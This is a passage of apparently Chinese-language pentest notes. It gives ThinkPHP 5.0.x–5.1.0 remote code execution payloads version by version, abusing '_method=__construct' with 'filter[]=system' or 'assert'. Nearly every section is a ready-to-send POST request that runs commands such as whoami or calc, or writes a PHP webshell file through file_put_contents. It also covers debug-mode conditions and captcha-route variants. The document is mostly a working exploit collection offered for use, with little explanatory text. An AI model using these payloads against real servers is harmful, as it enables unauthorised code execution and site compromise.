POST ?s=index/index
s=whoami&_method=__construct&method=POST&filter[]=system
aaaa=whoami&_method=__construct&method=GET&filter[]=system
_method=__construct&method=GET&filter[]=system&get[]=whoami
写shell
1
2
POST
s=file_put_contents('test.php','<?php phpinfo();')&_method=__construct&method=POST&filter[]=assert
4.2 5.0.1
debug 无关
命令执行
1
2
3
4
POST ?s=index/index
s=whoami&_method=__construct&method=POST&filter[]=system
aaaa=whoami&_method=__construct&method=GET&filter[]=system
_method=__construct&method=GET&filter[]=system&get[]=whoami
写shell
1
2
POST
s=file_put_contents('test.php','<?php phpinfo();')&_method=__construct&method=POST&filter[]=assert
4.3 5.0.2
debug 无关
命令执行
1
2
3
4
POST ?s=index/index
s=whoami&_method=__construct&method=POST&filter[]=system
aaaa=whoami&_method=__construct&method=GET&filter[]=system
_method=__construct&method=GET&filter[]=system&get[]=whoami
写shell
1
2
POST
s=file_put_contents('test.php','<?php phpinfo();')&_method=__construct&method=POST&filter[]=assert
4.4 5.0.3
debug 无关
命令执行
1
2
3
4
POST ?s=index/index
s=whoami&_method=__construct&method=POST&filter[]=system
aaaa=whoami&_method=__construct&method=GET&filter[]=system
_method=__construct&method=GET&filter[]=system&get[]=whoami
写shell
1
2
POST
s=file_put_contents('test.php','<?php phpinfo();')&_method=__construct&method=POST&filter[]=assert
4.5 5.0.4
debug 无关
命令执行
1
2
3
4
POST ?s=index/index
s=whoami&_method=__construct&method=POST&filter[]=system
aaaa=whoami&_method=__construct&method=GET&filter[]=system
_method=__construct&method=GET&filter[]=system&get[]=whoami
写shell
1
2
POST
s=file_put_contents('test.php','<?php phpinfo();')&_method=__construct&method=POST&filter[]=assert
4.6 5.0.5
debug 无关
命令执行
1
2
3
4
POST ?s=index/index
s=whoami&_method=__construct&method=POST&filter[]=system
aaaa=whoami&_method=__construct&method=GET&filter[]=system
_method=__construct&method=GET&filter[]=system&get[]=whoami
写shell
1
2
POST
s=file_put_contents('test.php','<?php phpinfo();')&_method=__construct&method=POST&filter[]=assert
4.7 5.0.6
debug 无关
命令执行
1
2
3
4
POST ?s=index/index
s=whoami&_method=__construct&method=POST&filter[]=system
aaaa=whoami&_method=__construct&method=GET&filter[]=system
_method=__construct&method=GET&filter[]=system&get[]=whoami
写shell
1
2
POST
s=file_put_contents('test.php','<?php phpinfo();')&_method=__construct&method=POST&filter[]=assert
4.8 5.0.7
debug 无关
命令执行
1
2
3
4
POST ?s=index/index
s=whoami&_method=__construct&method=POST&filter[]=system
aaaa=whoami&_method=__construct&method=GET&filter[]=system
_method=__construct&method=GET&filter[]=system&get[]=whoami
写shell
1
2
POST
s=file_put_contents('test.php','<?php phpinfo();')&_method=__construct&method=POST&filter[]=assert
4.9 5.0.8
debug 无关
命令执行
1
2
3
4
5
POST ?s=index/index
s=whoami&_method=__construct&method=POST&filter[]=system
aaaa=whoami&_method=__construct&method=GET&filter[]=system
_method=__construct&method=GET&filter[]=system&get[]=whoami
c=system&f=calc&_method=filter
写shell
1
2
POST
s=file_put_contents('test.php','<?php phpinfo();')&_method=__construct&method=POST&filter[]=assert
4.10 5.0.9
debug 无关
命令执行
1
2
3
4
5
POST ?s=index/index
s=whoami&_method=__construct&method=POST&filter[]=system
aaaa=whoami&_method=__construct&method=GET&filter[]=system
_method=__construct&method=GET&filter[]=system&get[]=whoami
c=system&f=calc&_method=filter
写shell
1
2
POST
s=file_put_contents('test.php','<?php phpinfo();')&_method=__construct&method=POST&filter[]=assert
4.11 5.0.10
从5.0.10开始默认debug=false,debug无关
命令执行
1
2
3
4
5
POST ?s=index/index
s=whoami&_method=__construct&method=POST&filter[]=system
aaaa=whoami&_method=__construct&method=GET&filter[]=system
_method=__construct&method=GET&filter[]=system&get[]=whoami
c=system&f=calc&_method=filter
写shell
1
2
POST
s=file_put_contents('test.php','<?php phpinfo();')&_method=__construct&method=POST&filter[]=assert
4.12 5.0.11
默认debug=false,debug无关
命令执行
1
2
3
4
5
POST ?s=index/index
s=whoami&_method=__construct&method=POST&filter[]=system
aaaa=whoami&_method=__construct&method=GET&filter[]=system
_method=__construct&method=GET&filter[]=system&get[]=whoami
c=system&f=calc&_method=filter
写shell
1
2
POST
s=file_put_contents('test.php','<?php phpinfo();')&_method=__construct&method=POST&filter[]=assert
4.13 5.0.12
默认debug=false,debug无关
命令执行
1
2
3
4
5
POST ?s=index/index
s=whoami&_method=__construct&method=POST&filter[]=system
aaaa=whoami&_method=__construct&method=GET&filter[]=system
_method=__construct&method=GET&filter[]=system&get[]=whoami
c=system&f=calc&_method=filter
写shell
1
2
POST
s=file_put_contents('test.php','<?php phpinfo();')&_method=__construct&method=POST&filter[]=assert
4.14 5.0.13
默认debug=false,需要开启debug
命令执行
1
2
3
4
5
POST ?s=index/index
s=whoami&_method=__construct&method=POST&filter[]=system
aaaa=whoami&_method=__construct&method=GET&filter[]=system
_method=__construct&method=GET&filter[]=system&get[]=whoami
c=system&f=calc&_method=filter
写shell
1
2
POST
s=file_put_contents('test.php','<?php phpinfo();')&_method=__construct&method=POST&filter[]=assert
POST ?s=captcha/calc
_method=__construct&filter[]=system&method=GET
我们继续
5.1 5.0.13补充
补充
有captcha路由时无需debug=true
1
2
POST ?s=captcha/calc
_method=__construct&filter[]=system&method=GET
5.2 5.0.14
默认debug=false,需要开启debug
命令执行
1
2
3
4
5
POST ?s=index/index
s=whoami&_method=__construct&method=POST&filter[]=system
aaaa=whoami&_method=__construct&method=GET&filter[]=system
_method=__construct&method=GET&filter[]=system&get[]=whoami
c=system&f=calc&_method=filter
写shell
1
2
POST
s=file_put_contents('test.php','<?php phpinfo();')&_method=__construct&method=POST&filter[]=assert
有captcha路由时无需debug=true
1
2
POST ?s=captcha/calc
_method=__construct&filter[]=system&method=GET
5.3 5.0.15
默认debug=false,需要开启debug
命令执行
1
2
3
4
5
POST ?s=index/index
s=whoami&_method=__construct&method=POST&filter[]=system
aaaa=whoami&_method=__construct&method=GET&filter[]=system
_method=__construct&method=GET&filter[]=system&get[]=whoami
c=system&f=calc&_method=filter
写shell
1
2
POST
s=file_put_contents('test.php','<?php phpinfo();')&_method=__construct&method=POST&filter[]=assert
有captcha路由时无需debug=true
1
2
POST ?s=captcha/calc
_method=__construct&filter[]=system&method=GET
5.4 5.0.16
默认debug=false,需要开启debug
命令执行
1
2
3
4
5
POST ?s=index/index
s=whoami&_method=__construct&method=POST&filter[]=system
aaaa=whoami&_method=__construct&method=GET&filter[]=system
_method=__construct&method=GET&filter[]=system&get[]=whoami
c=system&f=calc&_method=filter
写shell
1
2
POST
s=file_put_contents('test.php','<?php phpinfo();')&_method=__construct&method=POST&filter[]=assert
有captcha路由时无需debug=true
1
2
POST ?s=captcha/calc
_method=__construct&filter[]=system&method=GET
5.5 5.0.17
默认debug=false,需要开启debug
命令执行
1
2
3
4
5
POST ?s=index/index
s=whoami&_method=__construct&method=POST&filter[]=system
aaaa=whoami&_method=__construct&method=GET&filter[]=system
_method=__construct&method=GET&filter[]=system&get[]=whoami
c=system&f=calc&_method=filter
写shell
1
2
POST
s=file_put_contents('test.php','<?php phpinfo();')&_method=__construct&method=POST&filter[]=assert
有captcha路由时无需debug=true
1
2
POST ?s=captcha/calc
_method=__construct&filter[]=system&method=GET
5.6 5.0.18
默认debug=false,需要开启debug
命令执行
1
2
3
4
5
POST ?s=index/index
s=whoami&_method=__construct&method=POST&filter[]=system
aaaa=whoami&_method=__construct&method=GET&filter[]=system
_method=__construct&method=GET&filter[]=system&get[]=whoami
c=system&f=calc&_method=filter
写shell
1
2
POST
s=file_put_contents('test.php','<?php phpinfo();')&_method=__construct&method=POST&filter[]=assert
有captcha路由时无需debug=true
1
2
POST ?s=captcha/calc
_method=__construct&filter[]=system&method=GET
5.7 5.0.19
默认debug=false,需要开启debug
命令执行
1
2
3
4
5
POST ?s=index/index
s=whoami&_method=__construct&method=POST&filter[]=system
aaaa=whoami&_method=__construct&method=GET&filter[]=system
_method=__construct&method=GET&filter[]=system&get[]=whoami
c=system&f=calc&_method=filter
写shell
1
2
POST
s=file_put_contents('test.php','<?php phpinfo();')&_method=__construct&method=POST&filter[]=assert
有captcha路由时无需debug=true
1
2
POST ?s=captcha/calc
_method=__construct&filter[]=system&method=GET
5.8 5.0.20
默认debug=false,需要开启debug
命令执行
1
2
3
4
5
POST ?s=index/index
s=whoami&_method=__construct&method=POST&filter[]=system
aaaa=whoami&_method=__construct&method=GET&filter[]=system
_method=__construct&method=GET&filter[]=system&get[]=whoami
c=system&f=calc&_method=filter
写shell
1
2
POST
s=file_put_contents('test.php','<?php phpinfo();')&_method=__construct&method=POST&filter[]=assert
有captcha路由时无需debug=true
1
2
POST ?s=captcha/calc
_method=__construct&filter[]=system&method=GET
5.9 5.0.21
默认debug=false,需要开启debug
命令执行
1
2
POST ?s=index/index
_method=__construct&filter[]=system&server[REQUEST_METHOD]=calc
写shell
1
2
POST
_method=__construct&filter[]=assert&server[REQUEST_METHOD]=file_put_contents('test.php','<?php phpinfo();')
有captcha路由时无需debug=true
1
2
3
4
POST ?s=captcha/calc
_method=__construct&filter[]=system&method=GET
POST ?s=captcha
_method=__construct&filter[]=system&server[REQUEST_METHOD]=calc&method=get
5.10 5.0.22
默认debug=false,需要开启debug
命令执行
1
2
POST ?s=index/index
_method=__construct&filter[]=system&server[REQUEST_METHOD]=calc
写shell
1
2
POST
_method=__construct&filter[]=assert&server[REQUEST_METHOD]=file_put_contents('test.php','<?php phpinfo();')
有captcha路由时无需debug=true
1
2
3
4
POST ?s=captcha/calc
_method=__construct&filter[]=system&method=GET
POST ?s=captcha
_method=__construct&filter[]=system&server[REQUEST_METHOD]=calc&method=get
5.11 5.0.23
默认debug=false,需要开启debug
命令执行
1
2
POST ?s=index/index
_method=__construct&filter[]=system&server[REQUEST_METHOD]=calc
写shell
1
2
POST
_method=__construct&filter[]=assert&server[REQUEST_METHOD]=file_put_contents('test.php','<?php phpinfo();')
有captcha路由时无需debug=true
1
2
3
4
POST ?s=captcha/calc
_method=__construct&filter[]=system&method=GET
POST ?s=captcha
_method=__construct&filter[]=system&server[REQUEST_METHOD]=calc&method=get
5.12 5.0.24
作为5.0.x的最后一个版本,rce被修复
5.13 5.1.0
默认debug为true
命令执行
1
2
POST ?s=index/index
_method=__construct&filter[]=system&method=GET&s=calc
写shell
1
2
POST
s=file_put_contents('test.php','<?php phpinfo();')&_method=__construct&method=POST&filter[]=assert